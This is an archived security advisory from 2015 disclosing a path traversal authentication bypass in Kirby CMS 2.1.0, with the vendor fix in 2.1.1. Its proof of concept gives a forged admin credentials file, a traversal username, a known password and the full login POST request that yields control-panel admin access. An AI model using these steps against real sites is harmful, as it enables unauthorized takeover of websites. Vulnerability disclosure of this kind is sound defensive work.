Kirby CMS 2.1.0 Authentication Bypass / Traversal

2015-09-16T00:00:00
ID PACKETSTORM:133591
Type packetstorm
Reporter Dawid Golunski
Modified 2015-09-16T00:00:00

Description

                                        
                                            `=============================================  
- Release date: 14.09.2015  
- Discovered by: Dawid Golunski  
- Severity: Medium/High  
=============================================  
  
  
I. VULNERABILITY  
-------------------------  
  
Kirby CMS <= 2.1.0 Authentication Bypass via Path Traversal  
  
  
II. BACKGROUND  
-------------------------  
  
- Kirby CMS  
  
"Kirby is a file‑based CMS  
Easy to setup. Easy to use. Flexible as hell."  
  
http://getkirby.com/  
  
  
III. INTRODUCTION  
-------------------------  
  
KirbyCMS has a vulnerability that allows to bypass authentication in a hosting  
environment where users within the same shared environment can save/read files  
in a directory accessible by both the victim and the attacker.  
  
  
IV. DESCRIPTION  
-------------------------  
  
As KirbyCMS is a file based CMS, it also stores authentication data  
within files in accounts directory, each user has its own password file such as:  
kirby/site/accounts/[username].php  
At login, KirbyCMS refer to the password file to verify the passwor hash.  
During the process, it fails to validate the resulting path to ensure that  
it does not contain path traversal sequences such as '../' within the login  
variable provided by a user.  
  
This makes it vulnerable to a path traversal attack and allows to bypass  
the authentication if an attacker is located in the same multi-user hosting  
environment and can write files to a public directory such as /tmp accessible  
by the victim site with KirbyCMS.  
  
The exact code responsible for this vulnerability is located in  
kirby/core/user.php file and is shown below:  
  
---[ kirby/core/user.php ]---  
  
abstract class UserAbstract {  
  
protected $username = null;  
protected $cache = array();  
protected $data = null;  
  
public function __construct($username) {  
  
$this->username = str::lower($username);  
  
// check if the account file exists  
if(!file_exists($this->file())) {  
throw new Exception('The user account could not be found');  
}  
...  
}  
  
protected function file() {  
return kirby::instance()->roots()->accounts() . DS .  
$this->username() . '.php';  
}  
  
-----------------------------  
  
  
In addition to the authentication bypass KirbyCMS was found to allow  
authentication over HTTP protocol (resulting in passwords being sent  
unencrypted), and to never expire authenticated sessions.  
  
V. PROOF OF CONCEPT  
-------------------------  
  
KirbyCMS stores credentials in: kirby/site/accounts directory as PHP files  
to prevent the contents from being accessed directly via the web server.  
  
An example file with credentials looks as follows:  
  
---[ victimuser.php ]---  
  
<?php if(!defined('KIRBY')) exit ?>  
  
username: victim  
email: victim@mailserver.com  
password: >  
$2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC  
language: en  
role: admin  
  
------------------------  
  
To bypass the authentication an attacker who has an account in the same  
hosting environment as the victim can write the above credentials file  
containing an encrypted hash of the password: trythisout  
into a public directory such as:  
  
/tmp/bypassauth.php  
  
Because of the aformentioned Path Traversal vulnerability the attacker  
can use such credentials and log in as an administrator  
(via: http://victim-server.com/kirby/panel/login) with:  
  
Username: ../../../../../../../../tmp/bypassauth  
Password: trythisout  
  
which will produce a HTTP POST request similar to:  
  
POST /kirby/panel/login HTTP/1.1  
Host: victim_kirby_site  
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...  
Content-Length: 149  
  
username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...  
  
  
This will cause KirbyCMS to load credentials from the path:  
/sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php  
  
As a result, the attacker will get the following response:  
  
<h2 class="hgroup hgroup-single-line cf">  
<span class="hgroup-title">  
<a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a>  
</span>  
<span class="hgroup-options shiv shiv-dark shiv-left">  
  
getting access to the KirbyCMS control panel with admin rights.  
  
  
VI. BUSINESS IMPACT  
-------------------------  
  
Users who make use of vulnerable versions of KirbyCMS in shared hosting  
environments are at risk of having their website modified by unauthorized users.  
An attacker who manages to log in as an administrator will be able to change  
all the existing content as well as upload new files.  
This attack could be combined with the: 'CSRF Content Upload and PHP Script  
Execution' vulnerability, also discovered by Dawid Golunski and described in a  
separate document.  
  
VII. SYSTEMS AFFECTED  
-------------------------  
  
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.  
  
To exploit the vulnerability an attacker must be able to write a malicious  
credentials file on the system in a public directory that is accessible by the  
victim KirbyCMS site. This is a common situation on many hosting environments  
that allow to write/read files from temporary directories such as /tmp,  
/var/tmp etc.  
Such file could potentially also be uploaded by other means, even if  
the attacker does not have an account on the same server, such as anonymous FTP  
, an email attachment which gets saved in a tmp file on the server etc.  
  
  
VIII. SOLUTION  
-------------------------  
  
Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.  
  
IX. REFERENCES  
-------------------------  
  
http://legalhackers.com  
  
http://legalhackers.com/advisories/KirbyCMS-Path-Traversal-Authentication-Bypass-Vulnerability.txt  
  
http://getkirby.com/  
  
http://seclists.org/fulldisclosure/2015/Sep/index.html  
http://www.securiteam.com/  
  
  
X. CREDITS  
-------------------------  
  
The vulnerability has been discovered by Dawid Golunski  
dawid (at) legalhackers (dot) com  
legalhackers.com  
  
XI. REVISION HISTORY  
-------------------------  
  
14.09.2015 - Final  
  
XII. LEGAL NOTICES  
-------------------------  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this information.  
  
  
`